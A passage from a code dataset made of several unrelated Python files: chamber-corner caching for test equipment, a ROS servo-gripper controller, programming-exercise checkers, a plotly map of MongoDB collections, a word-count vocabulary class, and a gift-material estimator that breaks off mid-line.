log.debug(\"{0} : Chamber Corners = {1}\".format(container, listed_corners))\n\n # Now check for proper form of corners dict.\n for corner in corners:\n if not isinstance(corners[corner], tuple):\n log.error(\"Product specific corners are not in the proper form.\")\n raise apexceptions.AbortException\n\n # Get the current corner definition (possibly set by another container in the same chamber)\n S_KEY = '_'.join(container.split('|')[:-1])\n cc_key = 'chamber_corners_' + S_KEY\n with locking.named_priority_lock('__corners__' + S_KEY):\n try:\n log.debug(\"Chamber corner cache key (set) = {0}\".format(cc_key))\n established_corners = aplib.get_cached_data(cc_key)\n except (KeyError, apexceptions.ApolloException):\n established_corners = None\n\n if not forced_corners:\n # Save the product-specific corner selections for use by SEQ.\n if not established_corners:\n established_corners = corners\n aplib.cache_data(cc_key, established_corners)\n log.debug(\"*** A new chamber corner set has been established. ***\")\n\n # All UUT corner definitions must match. This allows different PIDs in the same chamber BUT requires them\n # to all have the same corner definition.\n if corners != established_corners:\n log.error(\"Chamber corners: REJECTED!\")\n log.error(\"There is a mismatch of chamber_corners in {0}. This is NOT allowed.\".format(container))\n log.error(\"Please correct the situation before running the chamber. Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"MISMATCH of chamber corners in {0}.\".format(container))\n else:\n log.debug(\"Chamber corners: ACCEPTED. {0}\".format(established_corners))\n else:\n aplib.cache_data(cc_key, corners)\n log.debug(\"Chamber corners: FORCED. {0}\".format(corners))\n\n return True\n\n\ndef get_global_corners(container_key=None):\n \"\"\" Get Corners\n This is strictly a read of the global cache; therefore no locking required.\n IMPORTANT: This is done by sequence_definition() so MUST be compatible with Apollo main process.\n Global cache key is the station path (i.e. chamber).\n :return:\n \"\"\"\n log.debug(\"Global Corners: get...\")\n if not container_key:\n log.debug(\"Need to get container key...\")\n container_key = aplib.get_my_container_key()\n S_KEY = '_'.join(container_key.split('|')[:-1])\n cc_key = 'chamber_corners_' + S_KEY\n try:\n log.debug(\"Chamber corner cache key (get) = {0}\".format(cc_key))\n corners = aplib.get_cached_data(cc_key)\n except (KeyError, apexceptions.ApolloException) as e:\n log.exception(\"Problem with chamber corners in global cache.\")\n log.exception(e.message)\n corners = None\n\n if not corners:\n log.error(\"Chamber corners: ABSENT!\")\n log.error(\"Global cache key = {0}\".format(cc_key))\n log.error(\"Please correct the situation before running the chamber. 
Inspect UUT product definitions.\")\n raise apexceptions.AbortException(\"Chamber corners: ABSENT!\")\n else:\n log.debug(\"Chamber corners: PRESENT.\")\n return corners\n\n\ndef set_chamber_slots(max_chamber_slots=None):\n active_chamber_slots_key, max_chamber_slots_key = get_chamber_slots_keys()\n max_slots = str(DEFAULT_MAX_CHAMBER_SLOTS) if not max_chamber_slots else max_chamber_slots\n aplib.cache_data(active_chamber_slots_key, [])\n aplib.cache_data(max_chamber_slots_key, max_slots)\n return True\n\n\ndef get_chamber_slots_keys(container_key=None):\n station = common_utils.get_station_key(container_key)\n active_chamber_slots_key = 'active_chamber_slots_{0}'.format(station)\n max_chamber_slots_key = 'max_chamber_slots_{0}'.format(station)\n return active_chamber_slots_key, max_chamber_slots_key\n","sub_path":"libs/equip_drivers/steps_ess_chamber.py","file_name":"steps_ess_chamber.py","file_ext":"py","file_size_in_byte":30607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"454500713","text":"#!/usr/bin/env python\nimport rospy\nimport math\nfrom dynamixel_sdk import * # Uses Dynamixel SDK library\nfrom std_msgs.msg import Float32\nfrom gps_agent_pkg.msg import GripperState\nimport numpy as np\nimport time\n\n# Control table address\nADDR_PRO_BAUD_RATE\t = 8\nADDR_PRO_RETURN_TIME\t = 9\nADDR_PRO_OPERATING_MODE\t = 11\nADDR_PRO_HOMING_OFFSET \t = 20\nADDR_PRO_MAX_POS \t = 48\nADDR_PRO_MIN_POS \t = 52\nADDR_PRO_TORQUE_ENABLE = 64 # Control table address is different in Dynamixel model\nADDR_PRO_PROFILE_VELOCITY = 112\nADDR_PRO_GOAL_POSITION = 116\nADDR_PRO_PRESENT_POSITION = 132\n\n# Data Byte Length\nLEN_PRO_GOAL_POSITION = 4\nLEN_PRO_PRESENT_POSITION = 4\nLEN_PRO_PROFILE_VELOCITY = 4\n\n\n# Protocol version\nPROTOCOL_VERSION = 2.0 # See which protocol version is used in the Dynamixel\n\n# Default setting\nDXL1_ID = 3 # Dynamixel#1 ID : 1\nDXL2_ID = 4 # Dynamixel#2 ID : 2\nBAUDRATE = 1000000 # Dynamixel default baudrate : 57600\nDEVICENAME = '/dev/ttyUSB0' # Check which port is being used on your controller\n # ex) Windows: \"COM1\" Linux: \"/dev/ttyUSB0\" Mac: \"/dev/tty.usbserial-*\"\nBAUD_RATE_SET\t\t \t= 3\t\t\t# 1000000\nOPERATING_MODE\t\t \t= 5 # Current-based Position Control Mode\n#Max Position Limit(48) and Min Position Limit(52) are only used in Position Control Mode with a single turn.\n\n# ** setserial /dev/ttyUSB0 low_latency - if you want more communication speed, write this in terminal https://github.com/ROBOTIS-GIT/DynamixelSDK/issues/80\n\n\nTORQUE_ENABLE = 1 # Value for enabling the torque\nTORQUE_DISABLE = 0 # Value for disabling the torque\n\nDXL_MOVING_STATUS_THRESHOLD = 10 # Dynamixel moving status threshold\n\n\nportHandler = PortHandler(DEVICENAME)\npacketHandler = PacketHandler(PROTOCOL_VERSION)\n\ngroupSyncWrite = GroupSyncWrite(portHandler, packetHandler, ADDR_PRO_GOAL_POSITION, LEN_PRO_GOAL_POSITION)\ngroupSyncWrite_ProfileVel = GroupSyncWrite(portHandler, packetHandler, ADDR_PRO_PROFILE_VELOCITY, LEN_PRO_PROFILE_VELOCITY)\ngroupSyncRead = GroupSyncRead(portHandler, packetHandler, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n\ndef dxl_init():\n # Open port\n if portHandler.openPort():\n print(\"Succeeded to open the port\")\n else:\n print(\"Failed to open the port\")\n quit()\n\n\n # Set port baudrate\n if portHandler.setBaudRate(BAUDRATE):\n print(\"Succeeded to change the baudrate\")\n else:\n print(\"Failed to change the baudrate\")\n quit()\n\n # Enable Dynamixel#1 Torque\n 
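# Torque must be enabled (ADDR_PRO_TORQUE_ENABLE, register 64) before goal-position writes take effect;\n    # each write1ByteTxRx call returns a (communication result, packet error) pair that is checked below.\n    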
dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL1_ID, ADDR_PRO_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % DXL1_ID)\n\n # Enable Dynamixel#2 Torque\n dxl_comm_result, dxl_error = packetHandler.write1ByteTxRx(portHandler, DXL2_ID, ADDR_PRO_TORQUE_ENABLE, TORQUE_ENABLE)\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n elif dxl_error != 0:\n print(\"%s\" % packetHandler.getRxPacketError(dxl_error))\n else:\n print(\"Dynamixel#%d has been successfully connected\" % DXL2_ID)\n\n # Add parameter storage for Dynamixel#1 present position value\n dxl_addparam_result = groupSyncRead.addParam(DXL1_ID)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncRead addparam failed\" % DXL1_ID)\n quit()\n\n # Add parameter storage for Dynamixel#2 present position value\n dxl_addparam_result = groupSyncRead.addParam(DXL2_ID)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncRead addparam failed\" % DXL2_ID)\n quit()\n\n dxl_profile_vel = 50\n param_profile_vel = [DXL_LOBYTE(DXL_LOWORD(dxl_profile_vel)),\n DXL_HIBYTE(DXL_LOWORD(dxl_profile_vel)),\n DXL_LOBYTE(DXL_HIWORD(dxl_profile_vel)),\n DXL_HIBYTE(DXL_HIWORD(dxl_profile_vel))]\n\n dxl_addparam_result = groupSyncWrite_ProfileVel.addParam(DXL1_ID, param_profile_vel)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL1_ID)\n quit()\n\n dxl_addparam_result = groupSyncWrite_ProfileVel.addParam(DXL2_ID, param_profile_vel)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL2_ID)\n quit()\n\n dxl_comm_result = groupSyncWrite_ProfileVel.txPacket()\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n\n # Clear syncwrite parameter storage\n groupSyncWrite_ProfileVel.clearParam()\n\ndef dis2inc(distance):\n if distance > 0.1:\n distance = 0.1\n elif distance < 0:\n distance = 0\n\n distance = distance/2+0.0065\n inc = int(math.degrees(math.asin((distance-0.0175)/0.07))/0.0879)\n\n return inc\n\ndef dxl_poscon(dis):\n # Allocate goal position value into byte array\n goal_pos = dis2inc(dis)\n dxl_goal_position_1 = 2048-goal_pos\n dxl_goal_position_2 = 2048+goal_pos\n param_goal_position_1 = [DXL_LOBYTE(DXL_LOWORD(dxl_goal_position_1)),\n DXL_HIBYTE(DXL_LOWORD(dxl_goal_position_1)),\n DXL_LOBYTE(DXL_HIWORD(dxl_goal_position_1)),\n DXL_HIBYTE(DXL_HIWORD(dxl_goal_position_1))]\n param_goal_position_2 = [DXL_LOBYTE(DXL_LOWORD(dxl_goal_position_2)),\n DXL_HIBYTE(DXL_LOWORD(dxl_goal_position_2)),\n DXL_LOBYTE(DXL_HIWORD(dxl_goal_position_2)),\n DXL_HIBYTE(DXL_HIWORD(dxl_goal_position_2))]\n\n # Add Dynamixel#1 goal position value to the Syncwrite parameter storage\n dxl_addparam_result = groupSyncWrite.addParam(DXL1_ID, param_goal_position_1)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL1_ID)\n quit()\n\n # Add Dynamixel#2 goal position value to the Syncwrite parameter storage\n dxl_addparam_result = groupSyncWrite.addParam(DXL2_ID, param_goal_position_2)\n if dxl_addparam_result != True:\n print(\"[ID:%03d] groupSyncWrite addparam failed\" % DXL2_ID)\n quit()\n\n # Syncwrite goal position\n dxl_comm_result = groupSyncWrite.txPacket()\n if dxl_comm_result != 
COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n\n # Clear syncwrite parameter storage\n groupSyncWrite.clearParam()\n\n while 1:\n # Syncread present position\n dxl_comm_result = groupSyncRead.txRxPacket()\n if dxl_comm_result != COMM_SUCCESS:\n print(\"%s\" % packetHandler.getTxRxResult(dxl_comm_result))\n\n # Check if groupsyncread data of Dynamixel#1 is available\n dxl_getdata_result = groupSyncRead.isAvailable(DXL1_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n if dxl_getdata_result != True:\n print(\"[ID:%03d] groupSyncRead getdata failed\" % DXL1_ID)\n quit()\n\n # Check if groupsyncread data of Dynamixel#2 is available\n dxl_getdata_result = groupSyncRead.isAvailable(DXL2_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n if dxl_getdata_result != True:\n print(\"[ID:%03d] groupSyncRead getdata failed\" % DXL2_ID)\n quit()\n\n # Get Dynamixel#1 present position value\n dxl1_present_position = groupSyncRead.getData(DXL1_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n\n # Get Dynamixel#2 present position value\n dxl2_present_position = groupSyncRead.getData(DXL2_ID, ADDR_PRO_PRESENT_POSITION, LEN_PRO_PRESENT_POSITION)\n\n print(\"[ID:%03d] GoalPos:%03d PresPos:%03d\\t[ID:%03d] GoalPos:%03d PresPos:%03d\" % (DXL1_ID, dxl_goal_position_1, dxl1_present_position, DXL2_ID, dxl_goal_position_2, dxl2_present_position))\n\n if not ((abs(dxl_goal_position_1- dxl1_present_position) > DXL_MOVING_STATUS_THRESHOLD) and (abs(dxl_goal_position_2 - dxl2_present_position) > DXL_MOVING_STATUS_THRESHOLD)):\n break\n\n return goal_pos\n # # Clear syncread parameter storage\n # groupSyncRead.clearParam()\n\nclass dummy(object):\n def __init__(self):\n dxl_init()\n rospy.init_node('dummy_env', anonymous=True)\n self.pub = rospy.Publisher('state_result_topic', Float32, queue_size=1)\n self.sub_trial = rospy.Subscriber('trial_command_topic', Float32, self.callback_trial)\n self.sub_reset = rospy.Subscriber('reset_command_topic', Float32, self.callback_reset)\n self.dis = 0.1\n dxl_poscon(self.dis)\n\n self.r = rospy.Rate(5)\n\n def callback_trial(self, command):\n self.dis += command.data / 100.0\n state = dxl_poscon(self.dis)\n self.pub.publish(state)\n\n def callback_reset(self, command):\n self.dis = 0.1\n state = dxl_poscon(self.dis)\n self.r.sleep()\n self.pub.publish(state)\n\n def run(self):\n rate = rospy.Rate(50)\n while not rospy.is_shutdown():\n rate.sleep()\n\nif __name__ == '__main__':\n dummy_robot = dummy()\n dummy_robot.run()","sub_path":"mservo_mani/scripts/dummy.py","file_name":"dummy.py","file_ext":"py","file_size_in_byte":9530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"651251014","text":"import ast\nimport inspect\nimport random\nimport string\nimport traceback\nimport typing\nfrom textwrap import indent\n\nfrom littleutils import only\n\nfrom core.utils import format_exception_string, returns_stdout\n\n\nclass ExerciseError(Exception):\n pass\n\n\nclass InvalidInitialCode(Exception):\n pass\n\n\ndef make_function(program, function_template):\n arg_names = inspect.signature(function_template).parameters\n tree = ast.parse(program)\n try:\n for node, arg_name in zip(tree.body, arg_names):\n assert isinstance(node, ast.Assign)\n target = only(node.targets)\n assert isinstance(target, ast.Name)\n assert target.id == arg_name\n except AssertionError:\n raise ExerciseError(f\"\"\"\\\nYour code should start like this:\n\n{indented_inputs_string(dict.fromkeys(arg_names, 
\"...\"))}\n\"\"\")\n\n assignments = tree.body[:len(arg_names)]\n exercise = tree.body[len(arg_names):]\n tree.body = assignments\n code = compile(tree, \"\", \"exec\", dont_inherit=True)\n initial_names = {}\n try:\n exec(code, initial_names)\n except Exception as e:\n raise InvalidInitialCode from e\n del initial_names[\"__builtins__\"]\n\n tree.body = exercise\n code = compile(tree, \"\", \"exec\", dont_inherit=True)\n\n def func(**kwargs):\n exec(code, kwargs)\n\n return initial_names, func\n\n\ndef match_returns_stdout(func, solution):\n if getattr(solution, \"returns_stdout\", False):\n func = returns_stdout(func)\n return func\n\n\ndef clean_result(result):\n if not isinstance(result, str):\n result = repr(result)\n result = '\\n'.join(line.rstrip() for line in result.rstrip().splitlines())\n result = result or ''\n result = indent(result, ' ')\n return result\n\n\ndef indented_inputs_string(inputs):\n return indent(inputs_string(inputs), ' ')\n\n\ndef inputs_string(inputs):\n return '\\n'.join(f'{name} = {value!r}'\n for name, value in inputs.items())\n\n\ndef check_result(func, inputs, expected_result):\n try:\n result = func(**inputs)\n except Exception as e:\n result = format_exception_string()\n\n cleaned_result = clean_result(result)\n expected_result = clean_result(expected_result)\n\n if cleaned_result != expected_result:\n inputs.pop(\"stdin_input\", None)\n if inputs:\n message = f\"\"\"\\\nGiven these values:\n\n{indented_inputs_string(inputs)}\n\nyour code outputs:\"\"\"\n else:\n message = \"Your code outputs:\"\n\n message += f\"\"\"\n\n{cleaned_result}\n\nwhen it should output:\n\n{expected_result}\n\"\"\"\n raise ExerciseError(message)\n return result\n\n\ndef generate_string(length=None):\n if length is None:\n length = random.randrange(5, 11)\n return \"\".join(random.sample(string.ascii_letters, length))\n\n\ndef generate_list(typ):\n return [\n generate_for_type(typ)\n for _ in range(random.randrange(5, 11))\n ]\n\n\ndef generate_for_type(typ):\n if isinstance(typ, typing._GenericAlias):\n if typ.__origin__ is list:\n return generate_list(only(typ.__args__))\n return {\n str: generate_string(),\n bool: random.choice([True, False]),\n int: random.randrange(100),\n }[typ]\n\n\n# This function is shown to the user, keep it simple\ndef assert_equal(actual, expected):\n if actual == expected:\n print(\"OK\")\n else:\n print(f\"Error! 
{repr(actual)} != {repr(expected)}\")\n","sub_path":"core/exercises.py","file_name":"exercises.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"496447491","text":"\"\"\"\nPlots each collection on a separate map.\n\"\"\"\n\nimport numpy as np \nimport pandas as pd\nimport plotly\nimport plotly.graph_objects as go\nimport pymongo\n\n# I make collections a list because my program will loop through each one,\n# opening each map in a new browser tab.\nclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\ndb = client[\"armageddon\"]\ncollections = [db[\"airports\"], db[\"cities\"], db[\"earthquakes\"], \n               db[\"volcanos\"], db[\"meteorites\"], db[\"ufos\"]]\n\n# Filename and marker color need to change with the collection being mapped\nnames = [\"airports\", \"cities\", \"earthquakes\", \"volcanos\", \n         \"meteorites\", \"ufos\"]\ncolor = [\"green\", \"violet\", \"orange\", \"yellow\", \"red\", \"blue\"]\nindex = 0\n\n# I will provide my token on request\ntoken = open(r\"mapbox_token.txt\").read()\n\n\n\nlat = []\nlon = []\n\nfor collection in collections:\n    for obj in collection.find():\n        lat.append(obj[\"latitude\"])\n        lon.append(obj[\"longitude\"])\n\n    fig = go.Figure(go.Scattermapbox(\n        lat = lat,\n        lon = lon,\n        mode = 'markers',\n        marker=go.scattermapbox.Marker(size=9, color = color[index])\n    ))\n\n\n\n    fig.update_layout(\n        autosize=True,\n        hovermode='closest',\n        mapbox=go.layout.Mapbox(\n            accesstoken=token,\n            bearing=0,\n            center=go.layout.mapbox.Center(\n                lat=33.930828,\n                lon=-98.484879\n            ),\n            pitch=0,\n            zoom=3\n        ))\n\n    plotly.offline.plot(fig, filename= names[index] +\".html\")\n    index += 1\n    lat.clear()\n    lon.clear()\n","sub_path":"A07/plotALLmapsSeparately.py","file_name":"plotALLmapsSeparately.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"599233217","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pickle\nimport codecs\nimport collections\nfrom functools import cmp_to_key\nimport json\nimport logging\n\nimport json_utils\nimport os\nimport numpy as np\n\n\n__all__ = ['OOV_TOK', 'SOS_TOK', 'EOS_TOK', 'WordCount']\n\n# general language modeling tokens\nOOV_TOK = '<oov>'\nSOS_TOK = '<sos>'\nEOS_TOK = '<eos>'\n\n'''Word Count'''\n\n\nclass WordCount(object):\n    def __init__(self, counter=None):\n        self._counter = collections.Counter() if counter is None else counter\n\n    ''' Built-in functions '''\n\n    def __len__(self):\n        return len(self._counter)\n\n    def __contains__(self, item):\n        return item in self._counter\n\n    def __str__(self):\n        return u'\\n'.join(map(lambda word_wid: u'{}\\t{}'.format(word_wid[0], word_wid[1]), self.ordered_tuples()))\n\n    ''' Accumulation '''\n\n    def observe(self, word, occurrences=1):\n        \"\"\"\n        Observe a word occurring so many times\n        :param word:\n        :param occurrences:\n        :return:\n        :type word: str\n        :type occurrences: int\n        :rtype: None\n        \"\"\"\n        try:\n            self._counter[word] += occurrences\n        except:\n            print (\"word:\",word,\"occurrences:\",occurrences)\n            raise\n\n    def update(self, other):\n        #print ('WordCount.update other: {}'.format(type(other)))\n        if isinstance(other, WordCount):\n            self._counter.update(other._counter)\n        else:\n            self._counter.update(other)\n        #print (\"_counter after update: \"+self._counter.__str__())\n\n    ''' Getters '''\n\n    def get_count(self, token):\n        \"\"\"\n        
Get the count for a token\n        :param token:\n        :return:\n        :type token: str\n        :rtype: int\n        \"\"\"\n\n        return self._counter[token]\n\n    def check_count(self, token):\n        \"\"\"\n        Get the count for a token, returning 0 if it is absent\n        :param token:\n        :return:\n        :type token: str\n        :rtype: int\n        \"\"\"\n        \n        try:\n            return self._counter[token]\n        except KeyError:\n            return 0\n\n    def total_observations(self):\n        \"\"\"\n        Get the sum of all observations\n        :return:\n        :rtype: int\n        \"\"\"\n        return sum(self._counter.values())\n\n    def ordered_counts(self):\n        \"\"\"\n        Get the counts only in descending order\n        :return:\n        \"\"\"\n        return sorted(self._counter.values(), key=lambda c: -c)\n\n    @staticmethod\n    def _wc_cmp(first, second):\n        \"\"\"\n        1. Descending by count\n        2. Ascending by token\n\n        :param first:\n        :param second:\n        :return:\n        \"\"\"\n        if first[1] != second[1]:\n            # descending by count\n            return second[1] - first[1]\n        # ascending by token\n        return (first[0] > second[0]) - (first[0] < second[0])\n\n    def ordered_tuples(self):\n        \"\"\"\n        Return a list of tuples (word, frequency) in descending order of frequency. (most frequent at top)\n        ALSO this maintains the order of items with equal frequency, which is a requirement for deriving vocabularies.\n        :return:\n        :rtype: list\n        \"\"\"\n        first_sorted = sorted(self._counter.items())\n        return sorted(first_sorted, key=lambda x : x[1], reverse=True)\n\n    ''' Filtering '''\n\n    def imposeMinCount(self, count, add_UNK=False):\n        if count < 2 and not add_UNK:\n            return self\n\n        ordered_tuples = self.ordered_tuples()\n        origLastSmall = lastSmall = -1 + len(ordered_tuples)\n        while lastSmall >= 1 and ordered_tuples[lastSmall][1] < count:\n            lastSmall -= 1\n\n        new_count = collections.Counter()\n        new_count.update(dict(ordered_tuples[:lastSmall + 1])) \n        oovCnt = sum((t[1] for t in ordered_tuples[lastSmall + 1:]))\n        if add_UNK and oovCnt < 1 and OOV_TOK not in new_count:\n            oovCnt = count\n        new_count[OOV_TOK] += oovCnt\n\n        logging.getLogger('Vocabulary').warn('Eliminating {} of the {} tokens with count less than {}. OOV_TOK: sum {} tokens'.format((origLastSmall-lastSmall), len(ordered_tuples), count, new_count[OOV_TOK]) )\n\n        return WordCount(new_count)\n\n    def trim(self, size):\n        \"\"\"\n        Trim this word count object to a particular size, placing the sum of the trimmed-off counts in the UNK token\n        :param size:\n        :return:\n\n        :type size: int\n        :rtype: WordCount\n        \"\"\"\n        ordered_tuples = self.ordered_tuples()\n        if size >= len(ordered_tuples):\n            return self\n        new_count = collections.Counter()\n        new_count.update(dict(ordered_tuples[:size]))\n        new_count[OOV_TOK] += sum((t[1] for t in ordered_tuples[size:]))\n\n        return WordCount(new_count)\n\n    def filter(self, filter_fun):\n        \"\"\"\n        Return a new WordCount with only tuples which match the filter. The sum of the filtered-out counts\n        is placed under the UNK token.\n        :param filter_fun: function which takes word and count e.g. 
lambda w, c: c > 10\n :return:\n\n :type filter_fun: callable\n :rtype: WordCount\n \"\"\"\n print (\"filter\")\n new_tuples = []\n unk_sum = 0\n for word, count in self._counter.items():\n if filter_fun(word, count):\n new_tuples.append((word, count))\n else:\n # LOGGER.info('UNK\\t%s\\t%d', word, count)\n unk_sum += count\n\n new_count = collections.Counter()\n new_count.update(dict(new_tuples))\n new_count[OOV_TOK] += unk_sum\n\n return WordCount(new_count)\n\n ''' Serialization '''\n\n def save(self, file_path):\n if file_path.endswith('.txt'):\n with codecs.open(file_path, 'w', 'utf8') as fp:\n fp.write(self.__str__())\n elif file_path.endswith('.json'):\n with codecs.open(file_path, 'w', 'utf8') as fp:\n json.dump(self.ordered_tuples(), fp)\n else:\n with open(file_path, 'wb') as fp:\n pickle.dump(self._counter, fp)\n\n @staticmethod\n def load(file_path, skip_tokens=[]):\n if file_path.endswith('.txt'):\n if len(skip_tokens): raise NotImplementedError\n wc = WordCount()\n with codecs.open(file_path, 'r', 'utf8') as fp:\n for line in fp:\n if not line.strip():\n continue\n try:\n w, c = line.split('\\t')\n except:\n raise ValueError('Failed to unpack line \"{}\"'.format(line))\n wc.observe(w, int(c))\n return wc\n elif file_path.endswith('.json'):\n skip = set(skip_tokens)\n wc = WordCount() \n with codecs.open(file_path, 'r', 'utf8') as fp:\n for w, c in json.load(fp):\n if w not in skip:\n wc.observe(w, c)\n return wc\n else:\n if len(skip_tokens): raise NotImplementedError\n wc = WordCount()\n with open(file_path, 'rb') as fp:\n wc._counter = pickle.load(fp)\n return wc\n","sub_path":"mm_dataset/word_count.py","file_name":"word_count.py","file_ext":"py","file_size_in_byte":7221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"231593898","text":"import re\nimport random\n\n\n# classes for child gift, and materials\n\n\nclass Child:\n UUID = '1234AV'\n name = 'Alex NewFolder'\n\n class Adress:\n Country = 'Romania'\n City = 'Galati'\n street = 'Strada Vietii'\n number = '420'\n\n gifts = []\n\n\nclass Gift:\n def __init__(self, obj, quantity, adjectives, uid):\n self.obj = obj\n self.quantity = quantity\n self.adjectives = adjectives\n self.UID = uid\n\n\nclass Materials:\n plastic = 0\n glass = 0\n textile = 0\n iron = 0\n aluminium = 0\n copper = 0\n gold = 0\n silver = 0\n wood = 0\n porcelain = 0\n rubber = 0\n paper = 0\n groceries = 0\n\n\n# lists with keywords for searching specific gifts\nelectronics = ['huawei', 'iphone', 'xiaomi', 'samsung', 'nintendo', 'xbox', 'smartphone', 'console', 'phone', 'tablet',\n 'oral-b', 'amd', 'nvidia', 'computer', 'laptop', 'tv', 'monitor', 'keyboard', 'microphone', 'headphones',\n 'camera', 'electronic', 'kindle', 'smart', 'robot', 'earphones', 'buds']\nfood = ['cheese', 'candy', 'fruit', 'chocolate', 'wafers']\ntextiles = ['pants', 'shirt', 't-shirt', 'dress', 'shorts', 'sandals', 'shoes', 'stiletto', 'wig', 'scarf', 'backpack',\n 'handbag', 'pillow', 'blanket', 'slippers', 'hoodie', 'hat', 'sweater', 'jeans', 'plush', 'nike', 'dior',\n 'burlon', 'balenciaga', 'adidas', 'versace', 'jordan', 'prada', 'gucci', 'kors', 'chanel', 'lv', 'moschino',\n 'zara', 'reserved', 'skirt']\npaper = ['poster', 'book', 'giftcard']\n\n# initializing child and materials\nMalumaLaurentiu = Child()\nMatL = Materials()\n\n# random input for testing the code\nMalumaLaurentiu.gifts.append(Gift(\"zee beez zing toy\", \"1\", \"khaki\", \"1234AV\"))\nMalumaLaurentiu.gifts.append(Gift(\"Huawei Media Pad T2 7\", 
\"1\", \"\", \"1234AV\"))\n# checking the keywords, first for the object and if that fails for the material -- if that also fails we're making it\n# a plastic toy, all values are assigned randomly for variation\nfor i in MalumaLaurentiu.gifts:\n declassified = 0\n toy = re.split(\" \", i.obj)\n for j in toy:\n if j.lower() in electronics:\n declassified = 1\n qtt = random.randrange(10, 18)\n qtt *= int(i.quantity)\n MatL.copper += qtt\n qtt = round(random.uniform(0.01, 1), 2)\n qtt *= int(i.quantity)\n MatL.gold = round(MatL.gold + qtt, 2)\n qtt = round(random.uniform(0.3, 0.6), 2)\n qtt *= int(i.quantity)\n MatL.silver = round(MatL.silver + qtt, 2)\n qtt = random.randrange(100, 500)\n qtt *= int(i.quantity)\n MatL.plastic += qtt\n qtt = random.randrange(10, 50)\n qtt *= int(i.quantity)\n MatL.glass += qtt\n qtt = round(random.uniform(10, 60), 2)\n qtt *= int(i.quantity)\n MatL.iron = round(MatL.iron + qtt, 2)\n break\n elif j.lower() in food:\n declassified = 1\n qtt = random.randrange(500, 2000)\n qtt *= int(i.quantity)\n MatL.groceries += qtt\n break\n elif j.lower() in textiles:\n declassified = 1\n qtt = random.randrange(250, 1000)\n qtt *= int(i.quantity)\n MatL.textile += qtt\n break\n elif j.lower() in paper:\n declassified = 1\n qtt = random.randrange(25, 250)\n qtt *= int(i.quantity)\n MatL.paper += qtt\n break\n elif j.lower() == 'bike' or j.lower() == 'bicycle':\n declassified = 1\n qtt = round(random.uniform(1000, 5000), 2)\n qtt *= int(i.quantity)\n MatL.aluminium = round(MatL.aluminium + qtt, 2)\n qtt = round(random.uniform(500, 750), 2)\n qtt *= int(i.quantity)\n MatL.rubber = round(MatL.rubber + qtt, 2)\n qtt = random.randrange(250, 500)\n qtt *= int(i.quantity)\n MatL.textile += qtt\n break\n elif j.lower() == 'doll':\n declassified = 1\n qtt = random.randrange(10, 20)\n qtt *= int(i.quantity)\n MatL.textile += qtt\n qtt = random.randrange(100, 250)\n qtt *= int(i.quantity)\n MatL.plastic += qtt\n break\n elif j.lower() == 'skateboard' or j.lower() == 'skate':\n declassified = 1\n qtt = random.randrange(450, 900)\n qtt *= int(i.quantity)\n MatL.wood += qtt\n qtt = round(random.uniform(100, 250), 2)\n qtt *= int(i.quantity)\n MatL.iron = round(MatL.iron + qtt, 2)\n qtt = round(random.uniform(100, 150), 2)\n qtt *= int(i.quantity)\n MatL.rubber = round(MatL.rubber + qtt, 2)\n break\n if declassified == 0:\n adj = re.split(\" \", i.adjectives)\n for j in adj:\n if j == 'copper':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.copper += qtt\n break\n elif j == 'golden':\n declassified = 1\n qtt = random.randrange(5, 200)\n qtt *= int(i.quantity)\n MatL.gold = round(MatL.gold + qtt, 2)\n break\n elif j == 'silver':\n declassified = 1\n qtt = random.randrange(5, 300)\n qtt *= int(i.quantity)\n MatL.silver = round(MatL.silver + qtt, 2)\n break\n elif j == 'aluminium':\n declassified = 1\n qtt = random.randrange(100, 500)\n qtt *= int(i.quantity)\n MatL.aluminium = round(MatL.aluminium + qtt, 2)\n break\n elif j == 'glass':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.glass = round(MatL.glass + qtt, 2)\n break\n elif j == 'porcelain':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.porcelain = round(MatL.porcelain + qtt, 2)\n break\n elif j == 'rubber':\n declassified = 1\n qtt = random.randrange(50, 500)\n qtt *= int(i.quantity)\n MatL.rubber = round(MatL.rubber + qtt, 2)\n break\n elif j == 'wooden':\n declassified = 1\n qtt = random.randrange(200, 1000)\n qtt *= 
